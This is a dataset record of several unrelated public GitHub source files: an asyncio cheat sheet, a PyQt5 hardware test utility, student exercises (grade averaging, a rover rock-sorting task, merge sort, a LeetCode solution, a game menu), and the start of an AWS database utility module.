asyncio.shield(task)\n#     # create the task to cancel the previous task\n#     asyncio.create_task(cancel_task(shielded))\n#     # handle cancellation\n#     try:\n#         # await the shielded task\n#         result = await shielded\n#         # report the result\n#         print(f'>got: {result}')\n#     except asyncio.CancelledError:\n#         print('shielded was cancelled')\n#     # wait a moment\n#     await asyncio.sleep(1)\n#     # report the details of the tasks\n#     print(f'shielded: {shielded}')\n#     print(f'task: {task}')\n#\n#\n# # start\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nIn this example we run a blocking function in an asynchronous program with the help of to_thread() in the entrypoint main().\nFirst, with to_thread(), we wrap the blocking function in a coroutine destined for the thread pool and wrap that in the task\ntask. We then suspend main(), which lets the task run under the hood via a ThreadPoolExecutor.\nMeanwhile blocking_task reports that it has started, blocks for 2 seconds and then reports that it is done.\n\"\"\"\n\n# # example of running a blocking io-bound task in asyncio\n#\n#\n# # a blocking io-bound task\n# def blocking_task():\n#     # report a message\n#     print('Task starting')\n#     # block for a while\n#     time.sleep(2)\n#     # report a message\n#     print('Task done')\n#\n#\n# # main coroutine\n# async def main():\n#     # report a message\n#     print('Main running the blocking task')\n#     # create a coroutine for the blocking task\n#     coro = asyncio.to_thread(blocking_task)\n#     # schedule the task\n#     task = asyncio.create_task(coro)\n#     # report a message\n#     print('Main doing other things')\n#     # allow the scheduled task to start\n#     await asyncio.sleep(0)\n#     # await the task\n#     await task\n#\n#\n# # run the asyncio program\n# asyncio.run(main())\n
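#\n# NOTE: asyncio.to_thread() requires Python 3.9+; on older versions the equivalent is loop.run_in_executor(None, blocking_task).\n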
########################################################################################################################\n\n\n\"\"\"\nIn this example we use the main() coroutine as the entry point of the asyncio program; it starts and runs a for loop.\nAn instance of the asynchronous iterator is created, and the loop drives it automatically via the anext() function to\nreturn an awaitable object. The loop then awaits the awaitable and extracts the value, which becomes available to the\nloop body, where it is reported.\n\"\"\"\n\n# # example of an asynchronous iterator with async for loop\n#\n#\n# # define an asynchronous iterator\n# class AsyncIterator:\n#     # constructor, define some state\n#     def __init__(self):\n#         self.counter = 0\n#\n#     # create an instance of the iterator\n#     def __aiter__(self):\n#         return self\n#\n#     # return the next awaitable\n#     async def __anext__(self):\n#         # check for no further items\n#         if self.counter >= 10:\n#             raise StopAsyncIteration\n#         # increment the counter\n#         self.counter += 1\n#         # simulate work\n#         await asyncio.sleep(1)\n#         # return the counter value\n#         return self.counter\n#\n#\n# # main coroutine\n# async def main():\n#     # loop over async iterator with async for loop\n#     async for item in AsyncIterator():\n#         print(item)\n#\n#\n# # execute the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\"\"\"\nIn this example the loop automatically awaits each awaitable object returned by the generator, extracts the\nyielded value and makes it available in the loop body so that, in this case, it can be reported.\n\"\"\"\n\n# # example of asynchronous generator with async for loop\n#\n#\n# # define an asynchronous generator\n# async def async_generator():\n#     # normal loop\n#     for i in range(10):\n#         # block to simulate doing work\n#         await asyncio.sleep(1)\n#         # yield the result\n#         yield i\n#\n#\n# # main coroutine\n# async def main():\n#     # loop over async generator with async for loop\n#     async for item in async_generator():\n#         print(item)\n#\n#\n# # execute the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nIn this example our main() coroutine, when run, creates an instance of the AsyncContextManager class in an async with\nexpression. The expression automatically calls the __aenter__ method, which prints a message and blocks for a moment;\nmain() then resumes and executes the body of the context (printing a message). The block is closed automatically\nvia a call to the __aexit__ method, which reports the exit to us and sleeps for a moment.\n\"\"\"\n\n\n# # example of an asynchronous context manager via async with\n# # define an asynchronous context manager\n# class AsyncContextManager:\n#     # enter the async context manager\n#     async def __aenter__(self):\n#         # report a message\n#         print('>entering the context manager')\n#         # block for a moment\n#         await asyncio.sleep(0.5)\n#\n#     # exit the async context manager\n#     async def __aexit__(self, exc_type, exc, tb):\n#         # report a message\n#         print('>exiting the context manager')\n#         # block for a moment\n#         await asyncio.sleep(0.5)\n#\n#\n# # define a simple coroutine\n# async def main():\n#     # create and use the asynchronous context manager\n#     async with AsyncContextManager() as manager:\n#         # report the result\n#         print(f'within the manager')\n#\n#\n# # start the asyncio program\n# asyncio.run(main())\n
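#\n# NOTE: contextlib.asynccontextmanager offers a decorator-based alternative for building async context managers.\n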
########################################################################################################################\n\n\n\"\"\"\nIn this example we run the echo command to return the string 'Hello World'. The main() coroutine calls the\ncreate_subprocess_exec() function and suspends while the process is created; the process instance is returned,\nthe coroutine resumes and reports the details of the subprocess. The output of the echo command is shown on the command line.\n\"\"\"\n\n# # example of executing a command as a subprocess with asyncio\n#\n#\n# # main coroutine\n# async def main():\n#     # start executing a command in a subprocess\n#     process = await asyncio.create_subprocess_exec('echo', 'Hello World')\n#     # report the details of the subprocess\n#     print(f'subprocess: {process}')\n#\n#\n# # entry point\n# asyncio.run(main())\n########################################################################################################################\n\n\"\"\"\nIn this example we run the 'echo' command to return a string.\nThe echo command writes the provided string directly to standard output.\n\"\"\"\n\n# # example of executing a shell command as a subprocess with asyncio\n#\n#\n# # main coroutine\n# async def main():\n#     # start executing a shell command in a subprocess\n#     process = await asyncio.create_subprocess_shell('echo Hello World')\n#     # report the details of the subprocess\n#     print(f'subprocess: {process}')\n#\n#\n# # entry point\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nIn this example we get the status of 10 popular websites using asyncio\n\"\"\"\n\n# # check the status of many webpages\n#\n#\n# # get the HTTP/S status of a webpage\n# async def get_status(url):\n#     # split the url into components\n#     url_parsed = urlsplit(url)\n#     # open the connection\n#     if url_parsed.scheme == 'https':\n#         reader, writer = await asyncio.open_connection(url_parsed.hostname, 443, ssl=True)\n#     else:\n#         reader, writer = await asyncio.open_connection(url_parsed.hostname, 80)\n#     # send GET request\n#     query = f'GET {url_parsed.path} HTTP/1.1\\r\\nHost: {url_parsed.hostname}\\r\\n\\r\\n'\n#     # write query to socket\n#     writer.write(query.encode())\n#     # wait for the bytes to be written to the socket\n#     await writer.drain()\n#     # read the single line response\n#     response = await reader.readline()\n#     # close the connection\n#     writer.close()\n#     # decode and strip white space\n#     status = response.decode().strip()\n#     # return the response\n#     return status\n#\n#\n# # main coroutine\n# async def main():\n#     # list of top 10 websites to check\n#     sites = ['https://www.google.com/',\n#              'https://www.youtube.com/',\n#              'https://www.facebook.com/',\n#              'https://twitter.com/',\n#              'https://www.instagram.com/',\n#              'https://www.baidu.com/',\n#              'https://www.wikipedia.org/',\n#              'https://yandex.ru/',\n#              'https://yahoo.com/',\n#              'https://www.whatsapp.com/'\n#              ]\n#     # check the status of all websites\n#     for url in sites:\n#         # get the status for the url\n#         status = await get_status(url)\n#         # report the url and its status\n#         print(f'{url:30}:\\t{status}')\n#\n#\n# # run the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\"\"\"\nChecking the status of the sites concurrently via the gather() function\n\"\"\"\n\n\n
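# Sample output (one line per site; actual statuses will vary):\n#   https://www.google.com/       :    HTTP/1.1 200 OK\n#   https://www.youtube.com/      :    HTTP/1.1 200 OK\n\n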
# get the HTTP/S status of a webpage\nasync def get_status(url):\n    # split the url into components\n    url_parsed = urlsplit(url)\n    # open the connection\n    if url_parsed.scheme == 'https':\n        reader, writer = await asyncio.open_connection(url_parsed.hostname, 443, ssl=True)\n    else:\n        reader, writer = await asyncio.open_connection(url_parsed.hostname, 80)\n    # send GET request\n    query = f'GET {url_parsed.path} HTTP/1.1\\r\\nHost: {url_parsed.hostname}\\r\\n\\r\\n'\n    # write query to socket\n    writer.write(query.encode())\n    # wait for the bytes to be written to the socket\n    await writer.drain()\n    # read the single line response\n    response = await reader.readline()\n    # close the connection\n    writer.close()\n    # decode and strip white space\n    status = response.decode().strip()\n    # return the response\n    return status\n\n\n# main coroutine\nasync def main():\n    # list of top 10 websites to check\n    sites = ['https://www.google.com/',\n             'https://www.youtube.com/',\n             'https://www.facebook.com/',\n             'https://twitter.com/',\n             'https://www.instagram.com/',\n             'https://www.baidu.com/',\n             'https://www.wikipedia.org/',\n             'https://yandex.ru/',\n             'https://yahoo.com/',\n             'https://www.whatsapp.com/'\n             ]\n    # create all coroutine requests\n    coros = [get_status(url) for url in sites]\n    # execute all coroutines and wait\n    results = await asyncio.gather(*coros)\n    # process all results\n    for url, status in zip(sites, results):\n        # report status\n        print(f'{url:30}:\\t{status}')\n\n\n# run the asyncio program\nasyncio.run(main())\n########################################################################################################################\n","repo_name":"Dmitrykevich/asyncio_cheat_sheet","sub_path":"asyncio_learn.py","file_name":"asyncio_learn.py","file_ext":"py","file_size_in_byte":21235,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71741231130","text":"#!python3\n\nimport sys\nimport threading\nfrom queue import Queue\nfrom time import sleep\nfrom datetime import datetime\nfrom ctypes import c_int\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore, QtGui, uic\nfrom PyQt5.QtCore import QRect, QRectF, Qt, pyqtSlot\nfrom ns_commander import NS3_Commander\nfrom ns_anim import NS_Animate\n\n\n__version__ = 2.574\n\n# main window class\nclass ns_utility(QMainWindow):\n\n    log_signal = QtCore.pyqtSignal(str, str)\n    test_progress_signal = QtCore.pyqtSignal(int)\n    device_ready_signal = QtCore.pyqtSignal(bool)\n\n    # constructor\n    def __init__(self):\n        super().__init__()\n\n        # Create the queue for threads\n        self.nqueue = Queue()\n        # init user interface\n        self.initUI()\n\n        # connect signals/slots\n        self.closeButton.clicked.connect(self.CloseButtonClicked)\n        self.startButton.clicked.connect(self.StartButtonClicked)\n        self.test_progress_signal.connect(self.test_progress_slot)\n        self.device_ready_signal.connect(self.device_ready_slot)\n        self.log_signal.connect(self.qlog_message)\n\n        # neilscope device command 'driver' object\n        self.ns3 = NS3_Commander()\n\n        # thread to communicate with the neilscope device\n        t = threading.Thread(target=self.ns_test_worker)\n        t.daemon = True  # thread dies when main thread exits.\n        t.start()\n\n        # start animation\n        self.anim.machine.start()\n\n        # set window to center and show\n        self.center()\n        self.show()\n\n        self.start_msg = [\n            'Testing util build ver: %.3f' % __version__,\n            'NeilScope 3',\n            'The full free SW/HW project',\n            'of 100Msps(2-CH) 200Msps(1-CH) digital storage',\n            'Oscilloscope and Logic Analyzer modes',\n            'Contributors:',\n            '---',\n            'Vladislav Kamenev :: LeftRadio',\n            'Ildar :: Muha',\n            '---',\n            'Special thanks to all who supported the project all the time !!!' 
]\n        self.nqueue.put('start')\n\n    # initialization UI\n    def initUI(self):\n        # load main ui window\n        self.uic = uic.loadUi('main.ui', self)\n\n        gr_rect = QRectF(0, 0, self.rect().width(), 20)\n        self.scene = QGraphicsScene(gr_rect)\n        self.scene.setBackgroundBrush(Qt.black)\n\n        self.anim = NS_Animate(self.scene,\n                               gr_rect.width(), gr_rect.height(),\n                               QtGui.QColor.fromRgb(0, 32, 49))\n\n        self.horizontalLayout_anim.addWidget(self.anim.window)\n\n        # self.anim.start()\n        self.anim.window.resize(gr_rect.width(), gr_rect.height())\n\n    # set window to center func\n    def center(self):\n        qr = self.frameGeometry()\n        cp = QDesktopWidget().availableGeometry().center()\n        qr.moveCenter(cp)\n        self.move(qr.topLeft())\n\n    # self logging message\n    def log(self, msg, lvl='ginf'):\n        self.log_signal.emit('\\'GL\\' ' + msg, lvl)\n\n    # device test sequence\n    def ns_test_seq(self):\n        # neilscope device test sequence program, [ command function, [func args], delay sec after, log message ]\n        ns_test_sequence = [\n            {'cmd': self.ns3.mode, 'data': 'la', 'delay': 0, 'msg': 'set mode \\'LA\\'...'},\n            {'cmd': self.ns3.send_sw_ver, 'data': [1.1, 0x02], 'delay': 0.5, 'msg': 'send sw ver...'},\n            {'cmd': self.ns3.mode, 'data': 'osc', 'delay': 0, 'msg': 'set mode \\'OSC\\'...'},\n            {'cmd': self.ns3.send_sw_ver, 'data': [1.1, 0x02], 'delay': 0.5, 'msg': 'send sw ver...'},\n            {'cmd': self.ns3.ach_state, 'data': ['AB', 'dc'], 'delay': 0, 'msg': 'set ch A/B DC input...'},\n            {'cmd': self.ns3.ach_div, 'data': ['AB', '50V'], 'delay': 0.05, 'msg': 'set ch A/B 50V/div...'},\n            {'cmd': self.ns3.ach_div, 'data': ['AB', '50mV'], 'delay': 0.05, 'msg': 'set ch A/B 50mV/div...'},\n            {'cmd': self.ns3.sync_mode, 'data': ['off'], 'delay': 0, 'msg': 'set sync off state...'},\n            {'cmd': self.ns3.sync_sourse, 'data': ['A'], 'delay': 0, 'msg': 'set sync source to ch A...'},\n            {'cmd': self.ns3.sync_type, 'data': ['rise'], 'delay': 0, 'msg': 'set sync type \\'rise\\'...'},\n            {'cmd': self.ns3.sweep_div, 'data': ['1uS'], 'delay': 0, 'msg': 'set sweep 1uS/div...'},\n            {'cmd': self.ns3.sweep_mode, 'data': ['standart'], 'delay': 0, 'msg': 'set sweep mode \\'standart\\'...'},\n            {'cmd': self.ns3.get_data, 'data': ['A', 100, []], 'delay': 0, 'msg': 'get ch A 100 bytes data...'},\n            {'cmd': self.ns3.get_data, 'data': ['B', 100, []], 'delay': 0, 'msg': 'get ch B 100 bytes data...'},\n        ]\n\n        progr_one_step = 100 / len(ns_test_sequence)\n        progr = 0\n\n        self.log('start test sequence')\n        for cn in ns_test_sequence:\n            self.log(cn['msg'])\n            # send sequence command\n            cmd_result = cn['cmd']( cn['data'] )\n            # result\n            if not cmd_result:\n                self.log('SUCCESS\\r\\n')\n                sleep(cn['delay'])\n                progr = progr + progr_one_step\n                self.test_progress_signal.emit(progr)    # emit progress signal\n            else:\n                self.log('FAILED\\r\\n', 'err')\n                return False\n        return True\n\n    # device main test\n    def ns_test_main(self):\n        lg = self.log\n        test_seq_flag = True\n        self.test_progress_signal.emit(0)    # reset completion progress to 0%\n\n        # set interface\n        index = self.combobox_Interface.currentIndex()\n\n        if self.chckbx_interface.checkState():\n            interface_log = self.log_signal.emit\n        else:\n            interface_log = None\n\n        if index == 0:\n            self.log(str(self.chckbx_interface.checkState()))\n            self.ns3.set_interface( interface = 'usbxpress', log = interface_log )\n\n        elif index == 1:\n            ip, port = self.lineEdit_IP_Port.text().split(':')\n            self.ns3.set_interface( interface = 'telnet', ip = ip, port = int(port), log = interface_log )\n\n        if self.nslog_chckbx.checkState():\n            self.ns3.set_log(self.log_signal.emit)\n        else:\n            
self.ns3.set_log(None)\n\n        lg('connect to device...')\n        if not self.ns3.connect():\n            lg('successfully connected to device, fw ver: %3.1F' %\n                self.ns3.mcu_firm_ver)\n\n            lg('get batt charge...')\n            battv = [int(0)]\n            if self.ns3.get_batt(battv):\n                return False\n            lg('batt charge: %d%s' % (battv[0], '%'))\n\n            # start test sequence\n            test_seq_flag = self.ns_test_seq()\n\n            lg('disconnect from device...')\n            if not self.ns3.disconnect():\n                lg('disconnect success')\n            else:\n                test_seq_flag = False\n                lg('FAILED', 'err')\n        else:\n            test_seq_flag = False\n            lg('FAILED', 'err')\n\n        # set completion progress to 100%\n        self.test_progress_signal.emit(100)\n\n        lg('\\r\\n///{0}///{0}///'.format('-' * 20), 'end')\n        if test_seq_flag:\n            lg('TEST SUCCESSFULLY DONE', 'end')\n        else:\n            lg('TEST FAILED', 'err')\n\n    # The worker thread pulls an item from the queue and processes it\n    def ns_test_worker(self):\n        while True:\n            item = self.nqueue.get()\n            with threading.Lock():\n                if item == 'start':\n                    import random\n                    for m in self.start_msg:\n                        self.log_signal.emit(m, '')\n                        sleep(random.uniform(0.15, 0.3))\n                if item == 'test':\n                    self.ns_test_main()\n                    sleep(0.5)\n                    self.device_ready_signal.emit(True)\n                    self.startButton.setEnabled(True)\n\n            self.nqueue.task_done()\n\n    # START button click slot\n    @pyqtSlot()\n    def StartButtonClicked(self):\n        if not self.startButton.isEnabled():\n            return\n        self.device_ready_signal.emit(False)\n        self.startButton.setEnabled(False)\n\n        self.nqueue.join()    # block until all tasks are done\n\n        self.textBrowser.clear()\n        self.chckbx_interface.toggled.emit(self.chckbx_interface.isChecked())\n        self.nslog_chckbx.toggled.emit(self.nslog_chckbx.isChecked())\n\n        self.nqueue.put('test')    # start ns test thread\n\n    # device test sequence progress signal/slot\n    old_progr = 0\n\n    def test_progress_slot(self, progress):\n        if (progress - self.old_progr) > 20:\n            self.anim.timer.setInterval(600 - (progress * 5))\n            self.old_progr = progress\n        elif not progress:\n            self.old_progr = progress\n\n    # device test sequence successful completion signal/slot\n    @pyqtSlot(bool)\n    def device_ready_slot(self, dev_rdy):\n        self.anim.timer.setInterval(1000)\n        # save log to file\n        f = open('logg.txt', 'wt')\n        f.write(self.textBrowser.toPlainText())\n        f.close()\n\n    # QtSlot for log messages\n    @pyqtSlot(str, str)\n    def qlog_message(self, msg, lvl=''):\n        txbr = self.textBrowser\n        qqolor = QtGui.QColor.fromRgb\n\n        if lvl == 'err':\n            txbr.setTextColor(qqolor(255, 64, 64))\n        elif lvl == 'warn':\n            txbr.setTextColor(qqolor(220, 220, 140))\n        elif lvl == 'ginf':\n            txbr.setTextColor(qqolor(255, 255, 255))\n        elif lvl == 'end':\n            txbr.setTextColor(qqolor(170, 255, 0))\n        elif lvl == 'inf':\n            txbr.setTextColor(qqolor(119, 255, 176))\n        else:\n            txbr.setTextColor(qqolor(212, 224, 212))\n\n        txbr.insertPlainText(\n            '%s: %s \\r\\n' % (str(datetime.utcnow()).split()[1], msg))\n        sb = txbr.verticalScrollBar()\n        sb.setValue(sb.maximum())\n        txbr.repaint()\n\n    # EXIT button click\n    @pyqtSlot()\n    def CloseButtonClicked(self):\n        self.close()\n\n\n# program start here\nif __name__ == '__main__':\n\n    app = QApplication(sys.argv)\n    QApplication.setStyle(QStyleFactory.create('Fusion'))\n    ex = ns_utility()\n    sys.exit(app.exec_())\n","repo_name":"LeftRadio/ns_test_util","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33978501566","text":"print(\"Sistema para calcular el promedio de un alumno.\")\n\nnombre = input(\"Para comenzar, ¿cuál es 
tu nombre: \")\n\nmatematicas = float(input(nombre + \" ¿Cuál es tu calificación en matematicas: \"))\nquímica = float(input(nombre + \" ¿Cuál es tu calificación en química: \"))\nbíologia = float(input(nombre + \" ¿Cuál es tu calificación en bíologia: \"))\n\npromedio = (matematicas + química + bíologia) / 3\n\nif promedio >=6:\n print(' Felicidades ' + nombre + ' \"Aprobaste\" con un promedio de: ', round(promedio,2))\n\nelse:\n print('Lo sientimos ' + nombre + ' \"Reprobaste\" el año con un promedio: ', round(promedio,2))\n\nprint(\"Fin\")\n","repo_name":"arteduro/Python_Ejercicios","sub_path":"Condicionales_Compuestas.py","file_name":"Condicionales_Compuestas.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74555621210","text":"#Nome da Disciplina: Estrutura de Dados.\n#Turma: 3° BD\n#Número da pergunta: 2\n#Titúlo da pergunta: Rover Curiosity\n#Integrante 1: Ivan Szoboszlay Junior\n#Integrante 2: Leonardo Silva de Oliveira\n#Data: 31/03/2020\n#Professor: Jorge Carlos Valverde Rebaza\nimport random\nfrom random import randrange, uniform\n\nclass Rocha:\n def __init__(self):\n listarocha = []\n\n def PuchPostRocha(self):\n tamanho = random.randint(30, 120)\n listarochapeso = []\n listadiamentro = []\n for rocha in range(100):\n listarochapeso.append(uniform(0.5, 2.5))\n listadiamentro.append(uniform(0, 0.74))\n return listarochapeso, listadiamentro\n\n'''\nclass LixoEspacial:\n def __init__(self, pinha = None):\n lista = []\n\n def PushPost(self):\n tamanho = random.randint(30,120)\n\n for peso in range(tamanho):\n lista.append(uniform(1.2,8.55))#peso do lixo espacial\n'''\n\nclass Curiosity:\n\n def __init__(self, lista=None, tipo1=None, tipo2=None, tipo3=None):\n self.lista = []\n self.lixo = []\n self.tipo1 = []\n self.tipo2 = []\n self.tipo3 = []\n self.teste = 0\n\n #Metodo de criação de post\n def PushPost(self,tipo, peso, diamentro):\n \n if tipo == 1: #Validar se o tipo é rocha\n\n if (peso>= 0.0 and peso<= 2.5) and (diamentro>=0.0 and diamentro<=0.74):#Condicao de peso ser menor de 2,5Kg e diamentro for menor de 0,74m\n classpropria = Curiosity()\n #classpropria.equilibrar()\n \n if peso <=0.83 and diamentro<=0.24:#Tipo 1\n self.tipo1.append(peso)\n \n elif peso > 0.83 and peso <= 1.25 and diamentro >0.24 and diamentro<=0.50:#Tipo 2\n self.tipo2.append(peso)\n else:\n self.tipo3.append(peso)\n\n else: \n self.teste += 1\n print(\"Rocha Descartado\") \n\n else:\n if tipo == \"metalico\":\n\n return 1 \n else:# Lixo nao metalico\n return 1 \n #Função para equilibrar as rocha \n\n #o robô avalia a\n #quantidade de rochas em função do seu tipo e, rejeita (elimina) as rochas necessárias até\n #ter uma quantidade mais ou menos equilibrada de tipos de rochas.\n\n def equilibrar(self):\n print(self.tipo1)\n Peso_Total = 0\n comparacao = []\n Peso_Total += sum(self.tipo1)\n Peso_Total += sum(self.tipo2)\n Peso_Total += sum(self.tipo3)\n print(Peso_Total,\"Teste\")\n if Peso_Total <= 70:#Verificar o peso do armazenamento\n return True\n else:\n print(\"Acionou a funcao de equilibrar\") \n comparacao.append(len(self.tipo1))\n comparacao.append(len(self.tipo2))\n comparacao.append(len(self.tipo3))\n comparacaomenor = 3\n vazio = 0\n for i in range(3):\n if comparacao[i] == 0:\n vazio += 1\n \n #Caso apenas uma das lista tenha valor\n if vazio == 2:\n if len(self.tipo1) > 0:\n acima = self.tipo1\n\n elif len(self.tipo2) > 0:\n acima = self.tipo2\n\n else:\n acima = self.tipo3\n \n unico 
= max(comparacao) // 2\n                for i in range(unico):\n                    del(acima[i])  \n                return True     \n            else:\n\n                # check whether any of (tipo1, tipo2, tipo3) is empty  \n                if len(self.tipo1) == 0:\n                    comparacaomenor=0\n                elif len(self.tipo2) == 0:\n                    comparacaomenor = 1\n                else:\n                    comparacaomenor = 2\n\n                maior=max(comparacao)\n                # check whether all 3 lists (tipo1, tipo2, tipo3) have more than 0 items.\n                if comparacaomenor != 3:\n                    posicaomaior = comparacao.index(maior)\n                    # if tipo1 is empty  \n                    if comparacaomenor == 0:\n                        # if the largest is at position 1, copy the value from position 2 into 0.\n                        if posicaomaior == 1:\n                            comparacao[0] = comparacao[2]\n                        # otherwise copy the value from position 1 into 0.\n                        else:\n                            comparacao[0] = comparacao[1]\n                    # if tipo2 is empty\n                    elif comparacaomenor == 1:\n                        # if the largest is at position 0, copy the value from position 2 into position 1 of comparacao\n                        if posicaomaior == 0:\n                            comparacao[1] = comparacao[2]\n                            print(comparacao,\"1\")\n                        # otherwise give position 1 the value from position 0\n                        else:\n                            comparacao[1] = comparacao[0]\n                            print(comparacao, \"2\")\n                    # if tipo3 is empty  \n                    else:\n                        # if the largest is at position 0, copy the value from position 1 into position 2 of comparacao\n                        if posicaomaior == 0:\n                            comparacao[2] = comparacao[1]\n                            \n                        # otherwise replace the value at position 2 with the one from position 0\n                        else:\n                            comparacao[2] = comparacao[0]\n                    \n                    \n                menor = min(comparacao)\n                tirar = maior-menor\n                controle = 0\n                # loop that deletes values from tipo1, tipo2 and tipo3 until they are balanced  \n                while controle != 2:\n                    # check whether tipo1, tipo2 and tipo3 are balanced  \n                    if len(self.tipo2) == len(self.tipo1) == len(self.tipo3) or len(self.tipo1) == len(self.tipo2) or len(self.tipo2) == len(self.tipo3) or len(self.tipo3) == len(self.tipo1) :\n                        controle = 2\n                    else:\n                        x = comparacao.index(maior) # get the index of the largest value in comparacao\n                        if x == 0:\n                            for i in range(tirar):\n                                del(self.tipo1[i]) # delete a value from the list\n                            comparacao[0] = menor\n                        elif x == 1:\n                            for i in range(tirar):\n                                del(self.tipo2[i]) # delete a value from the list\n                        else:\n                            for i in range(tirar):\n                                del(self.tipo3[i]) # delete a value from the list\n                        maior = max(comparacao)\n                    maior = max(comparacao)\n                    menor = min(comparacao)\n                    tira = maior-menor\n                return True  \n            \n'''\n\n    def rejeita(self):\n        pinha=[]\n        lista=[]\n        # instantiate the class  \n        armazenamento=Rocha()\n        for x in range(30):\n            \n            tamanho=random.randint(30,120)\n            pinha.append(uniform(0.5,14.2)) # weight of the rocks\n\n'''\nrobo = Curiosity()\nrocha = Rocha()\npeso, diamentro = rocha.PuchPostRocha()\nprint(f\"Peso das rochas coletadas: {peso}.\")\nprint(f\"Diamentro das rochas coletadas: {diamentro} .\")\n\nfor x in range(len(peso)):\n    robo.PushPost(1, peso[x], diamentro[x])\nprint(\"Teste \", robo.teste)\nprint(\"Tipo1: \", robo.tipo1)\nprint(\"Tipo2: \", robo.tipo2)\nprint(\"Tipo3: \", robo.tipo3)\n\n\n","repo_name":"Leonardoliveira/Formacao-Python","sub_path":"AC02-EstruturaDeDados/ac2final_Parte2.py","file_name":"ac2final_Parte2.py","file_ext":"py","file_size_in_byte":7718,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"28877451969","text":"'''\r\nThis program implements merge sort to sort an array of length n\r\nAuthor: Juan Ríos\r\n'''\r\n\r\ndef read_file(path):\r\n    File = open(path,'r')\r\n    content = File.read()\r\n    array = content.split('\\n')\r\n    tmp = []\r\n    for i in array:\r\n        tmp.append(int(i))\r\n    return tmp\r\n\r\n\r\ndef merge(b_array, c_array):\r\n    n = len(b_array)+len(c_array)\r\n    d_array = []\r\n    i = 
0\r\n    j = 0\r\n    inv = 0\r\n    for k in range(n):\r\n        if b_array[i] List[int]:\n        N = len(nums)\n        res, curr = [0] * N, 1\n        res[0] = nums[0] # make it a cumulative product array\n        for i in range(1, N):\n            res[i] = nums[i] * res[i-1]\n        \n        for i in range(N-1, 0, -1): # go backwards\n            res[i] = res[i-1] * curr # curr = everything to the right of i, res[i-1] = everything to the left of i\n            curr *= nums[i] # update curr\n        res[0] = curr # bounds issues\n        return res\n    \n","repo_name":"apluscs/Leetcode","sub_path":"0238. Product of Array Except Self.py","file_name":"0238. Product of Array Except Self.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"10823498223","text":"import forca\nimport adivinhação\n\ndef escolhe_game():\n    #Header\n    print(\"-=-\"*13)\n    print(\"Escolha seu jogo:\")\n    print(\"-=-\"*13)\n\n    while True:\n        option = int(input(\"(1) Adivinhação (2) Forca (3) Sair\\n\"))\n        if(option == 1):\n            adivinhação.advinhação()\n        elif(option == 2):\n            forca.forca()\n        else:\n            break\n\n    #Footer\n    print(\"Fim do jogo, obrigado por jogar!!\")\n    print(\"-=-\"*13)\n\n#main\nif __name__ == '__main__':\n    escolhe_game()","repo_name":"Felipe-Baz-XDS/Jogos-Curso-python","sub_path":"jogos.py","file_name":"jogos.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35801463555","text":"\"\"\"Databases Utilities.\"\"\"\n\nimport importlib.util\nimport logging\nimport ssl\nfrom typing import Any, Dict, Generator, Iterator, List, NamedTuple, Optional, Tuple, Union, cast, overload\n\nimport boto3\nimport pyarrow as pa\nfrom typing_extensions import Literal\n\nimport awswrangler.pandas as pd\nfrom awswrangler import _data_types, _utils, exceptions, oracle, secretsmanager\nfrom awswrangler.catalog import get_connection\n\n_oracledb_found = importlib.util.find_spec(\"oracledb\")\n\n_logger: logging.Logger = logging.getLogger(__name__)\n\n\nclass ConnectionAttributes(NamedTuple):\n    \"\"\"Connection Attributes.\"\"\"\n\n    kind: str\n    user: str\n    password: str\n    host: str\n    port: int\n    database: str\n    ssl_context: Optional[ssl.SSLContext]\n\n\ndef _get_dbname(cluster_id: str, boto3_session: Optional[boto3.Session] = None) -> str:\n    client_redshift = _utils.client(service_name=\"redshift\", session=boto3_session)\n    res = client_redshift.describe_clusters(ClusterIdentifier=cluster_id)[\"Clusters\"][0]\n    return res[\"DBName\"]\n\n\ndef _get_connection_attributes_from_catalog(\n    connection: str, catalog_id: Optional[str], dbname: Optional[str], boto3_session: Optional[boto3.Session]\n) -> ConnectionAttributes:\n    details: Dict[str, Any] = get_connection(name=connection, catalog_id=catalog_id, boto3_session=boto3_session)[\n        \"ConnectionProperties\"\n    ]\n    if \";databaseName=\" in details[\"JDBC_CONNECTION_URL\"]:\n        database_sep = \";databaseName=\"\n    else:\n        database_sep = \"/\"\n    port, database = details[\"JDBC_CONNECTION_URL\"].split(\":\")[-1].split(database_sep)\n    ssl_context: Optional[ssl.SSLContext] = None\n    if details.get(\"JDBC_ENFORCE_SSL\") == \"true\":\n        ssl_cert_path: Optional[str] = details.get(\"CUSTOM_JDBC_CERT\")\n        ssl_cadata: Optional[str] = None\n        if ssl_cert_path:\n            bucket_name, key_path = _utils.parse_path(ssl_cert_path)\n            client_s3 = _utils.client(service_name=\"s3\", session=boto3_session)\n            try:\n                ssl_cadata = client_s3.get_object(Bucket=bucket_name, Key=key_path)[\"Body\"].read().decode(\"utf-8\")\n            except 
